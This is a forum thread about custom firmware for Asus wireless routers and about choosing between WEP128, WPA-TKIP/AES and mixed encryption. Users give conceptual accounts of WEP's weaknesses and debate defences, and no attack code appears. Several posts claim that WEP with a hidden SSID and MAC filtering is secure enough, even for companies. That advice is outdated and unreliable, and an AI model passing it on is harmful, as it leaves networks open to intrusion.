Customized firmwares of the 1.7.6.x and 1.7.9.x were released pretty soon after Asus made them public... and now with the 1.8.x range (now 1.8.1.9) its been a while since the specialists tuned it up a bit :D

Whats wrong with it? :confused: Is it harder to change the code of this new layout firmware... is free firmware space limited or do you wanna release a lot of fixes at the same time?

I don`t wanna sound rude whatsoever :) I`m already really pleased you all put so much effort in making this a wonderfull gadget... keep it up!!!

But the mixed encryption option... and availability of USB options in accesspoint only mode are very usefull! and the bugs mentioned on this forum (WPA-TKIP/AES and WEP128 at the same time) and other issues like webcam need some tuning-up as you ofcourse know.

This makes me very impatiant hehehe :rolleyes: I would love to try out a new release to see if it works better... or at least know a bit how far its progressing.

so if there is some news please post it :-) it will keep me from refreshing the page every 5 minutes with my fingers crossed hehehe

Tnx!
:cool:

Be patient, 1.8.1.7-1 is already up and running for me and Antiloop. We're now performing beta testing. :)
There are lot of internal changes as I wrote before.

ok to reveal some things:

the webcam issue is at this moment still present, hard to reproduce and nobody has got time to look into it

the mixed encryption is a bit vague, no documentation available for this 'feature' also google gives 0 usefull results
i have managed so this should work with 1.8.1.7 at least to get WPA-AES/TKIP and WEP128 working as follow:
WPA-PSK AES connects but get's no IP so encryption or something is wrong
WPA-PSK TKIP connects seems to work fine
WEP128 connects seems to work fine (set to key 2 or 3 at client ofcourse otherwise it will not connect, I used my A716 to test wep128)
so if anyone has documentation especially on the util 'nas' from broadcom please publish it!

ps when using WPA-PSK TKIP/AES and WEP128 and WDS
the devices connects without a problem to the other WDS device(which is only running WPA-PSK TKIP/AES)

ok to reveal some things:
.....
i have managed so this should work with 1.8.1.7 at least to get WPA-AES/TKIP and WEP128 working as follow:
WPA-PSK TKIP connects seems to work fine
WEP128 connects seems to work fine (set to key 2 or 3 at client ofcourse otherwise it will not connect, I used my A716 to test wep128)
.....


I use two units with 1.7.5.9 rc5 using WDS to cover a big hall and both in AP only Hybrid mode hooked up to a router firewall box with build in adsl modem. I have reached the limit of 64 clients in the ACL of which about 30 concurrent users. To keep some bandwith I say were FULL to all new applies :D and turning the ACL list off is out of the question :p Security is very important.

Now these clients are extremely mixed like linux, windows 2000 , xp sp2, ipaq pocketpc`s and since a little while a apple laptop. WEP128 key 2 "gave" best result, the arrival of the apple airport wlan gave a new challenge though.
The Airport (FW3.4.3) cannot select a key number (http://docs.info.apple.com/article.html?artnum=106250) for WEP encryption so we need WPA-TKIP, AES or WEP128 key 1 for this one.

Now I could tell all users to change their settings to key 1 and change this on the AP`s keeping the current firmware. Than it will be WEP128 Key1 to all users.

Since WEPxxx is pretty easy to hack... I personal would like to use as much WPA-TKIP and AES as possible... its also easier to configure I think.
So another option is upgrade to the latest 1.8.x.x firmware and start using mixed encryption. Than I can hopefully offer wifi to all clients too in a more secure way.

What would you advice me? Since its production environment its very important that is is stable but that and security combined is ideal :)

Since WEPxxx is pretty easy to hack... I personal would like to use as much WPA-TKIP and AES as possible... its also easier to configure I think.:)So how would you proceed hacking? I think it's not that simple, you will need a significant number of packets with the same IV and similar content. IMHO WEP 128 combined with blocking broadcast SSID, MAC adress filtering and regular key change is pretty secure.


What would you advice me? Since its production environment its very important that is is stable but that and security combined is ideal :)If its that important I would certainly not rely on cheap equipment using custom firmware from an "unknown" source unless you can read and understand the consequences of every line of code. Please don't misunderstand me, I think that most of the people producing the custom firmware have only good intentions, but you can never be sure. I think it would be fairly easy to integrate a few lines of code broadcasting or even sending your IP's, ssid, wep keys, passphrases, connection secrets etc. directly to the firmware builder (unless the router is behind a very well configured firewall). Even if the custom firmware producers have only good intentions they may have introduced flaws in the code opening entry points for hackers. This happens even to professional programming teams (microsoft, symantec etc.).

Laptops and PDA's are in general security risks unless they are only used within the secure production environment.

Best thing to do is probably hire a network security expert for a few days and take his advice into account. This is generally cheaper then loosing one or more production days or sensitive information.

P.S. Depending on the configuration WPA may even be more vulnerable then WEP128:
http://www.wi-fiplanet.com/columns/article.php/1556321
http://www.wi-fiplanet.com/news/article.php/3105271
"attackers who want to compromise WEP and LEAP need to harvest large quantities of network traffic before they can decipher the passphrase. In contrast, WPA only requires them to capture four specific packets of data" :http://www.computerworld.com.au/index.php?id=1184557545&eid=-255

"attackers who want to compromise WEP and LEAP need to harvest large quantities of network traffic before they can decipher the passphrase. In contrast, WPA only requires them to capture four specific packets of data"


I think collecting large amount of data is pretty simple with so many users :)
About the key for WPA... I made it 63 long not standard words but with lots of different characters in it to make brute force dictionary attack difficult.
Also I put the WPA re-key time to 86400. This combined with the other security features like ACL and hide SSID should make it a better encryption than WEP128 right?

About the custom fw.... if Asus trusts Oleg and Antiloop than I do too :cool: also the nice thing about this forum is that many people look at the code... so if one puts spy/buggy code in it I hope he gets flamed by the other forum users hehehe

I think collecting large amount of data is pretty simple with so many users :)
About the key for WPA... I made it 63 long not standard words but with lots of different characters in it to make brute force dictionary attack difficult.
Also I put the WPA re-key time to 86400. This combined with the other security features like ACL and hide SSID should make it a better encryption than WEP128 right?

About the custom fw.... if Asus trusts Oleg and Antiloop than I do too :cool: also the nice thing about this forum is that many people look at the code... so if one puts spy/buggy code in it I hope he gets flamed by the other forum users hehehe
why not using VPN over your wireless?

Brubber, as WEP128 is secure enough for home users IMHO, for businesses its certainly not. According to a Dutch computer magazine C'T WEP 104 can be cracked after 5 to 10 million packets. So when the radiocell is busy enough and transmits mostly small packets, a hacker with a good connection can decipher the key in 10 minutes.

For home users, with much less traffic, it can take a hacker with a slower connection (through distance) weeks to hack the key.

a hacker with a good connection can decipher the key in 10 minutes.Sure, if you're not using aditional security such as Block Broadcast SSID, use a password like SSID, MAC adress filtering, Use static IP's outside default range, use different default keys on workstations and AP, Use well configured firewalls. This should make it secure enough for defense against simple "War drivers" IMHO Professional hackers will always find a way into your system if the really want to, no matter what you do.


if Asus trusts Oleg and Antiloop than I do tooYep, me too, but the risk of flaws remains.


Also I put the WPA re-key time to 86400. This combined with the other security features like ACL and hide SSID should make it a better encryption than WEP128 right?Sure, but you can still do a lot better. I agree with Antilope (Use VPN) however this may have significant performance effects. You may also consider using EAP and (T)TLS or PEAP however this will require a RADIUS server.

Another good option you may wish to look into is Linksys Wireless Guard (http://www.linksys.com/wirelessguard/). This is relatively cheap, fairly secure (authentication with RADIUS and PEAP, TKIP or AES encryption), easy to manage (requires little knowledge), I'm only not 100% sure if this will also work with MAC / Linux clients (just ask them).

Or get 802.11i equipment (WPA2 and AES encryption.

Brubber, as WEP128 is secure enough for home users IMHO, for businesses its certainly not. According to a Dutch computer magazine C'T WEP 104 can be cracked after 5 to 10 million packets. So when the radiocell is busy enough and transmits mostly small packets, a hacker with a good connection can decipher the key in 10 minutes.

For home users, with much less traffic, it can take a hacker with a slower connection (through distance) weeks to hack the key.
Believe me, it really isn't that easy.

There are a few reason's why WEP could be easy to crack. The first is the authentication protocol if you use "shared key" for authentication. Basically the AP sends unencrypted text to the client, then the clients encrypt the text and returns it. This is pretty stupid, the attacker now has an encrypted and the unencrypted packet. Even more stupid, the challenge text is always 128 bytes to help the attacker :) So just configure an "open" system for authentication. (the client is allowed to associate with the AP, but is unable to send and/or receive any data without the correct WEP key)

The key generator for 40 bit keys (which is not WiFi standard!!) in most implementations is flawed. In most firmwares it is possible to enter text and a WEP key is created based on the text. NEVER use this for 40 bit keys, generation of 104 bit keys is not flawed, so that can be used. But is it much better to just type a random WEP key instead of using flawed key generators.

WEP is using an RC4 stream cypher (RSA) encryption which itself is not unsecure, the implementation is unsecure. An 128 bit WEP key is split in two parts, 104 bits shares secret, and 24 bits IV key. (the latter is send in clear text) A rule with encryption is to _never_ reuse a key. Unfortunately a lot of WEP implementations do reuse IV keys so the WEP/RC4 implementation is not secure. So if vendors use key generators which never ever reuse keys based on a schedule the WEP impementation is a lot more secure.

Another flaw with WEP is that every IP packet starts with the exact same information. (ARP packet information) You need lots and lots of information to crack the WEB key. Even on a heavily used wireless network you need hours and hours to collect enough data.

So if you configure your wireless network the right way, there is not a real problem. For most networks (even company networks) WEP is secure enough to be used. If you use a key exchange like 802.1x it's even more secure, and too difficult for most people to try to crack it.


Sure, if you're not using aditional security such as Block Broadcast SSIDIf a client tries to associate with an AP it sends the unencrypted SSID, so you only have to wait till someone is turning on their computer and you have the SSID. I broadcast the SSID (which I believe is even required by the WiFi specification) because it offers no protection at all imho.

Jeroen, I got that info from a well established computer magazine. I don't have enough wireless knowledge to agree or disagree, but that's what they wrote.

A RADIUS server with a key change interval of one hour would be pretty secure as well I guess. Perhaps you can try to get FreeRADIUS compiled and running on the router or another server...

For those interested: http://www.trusted-mobile.org/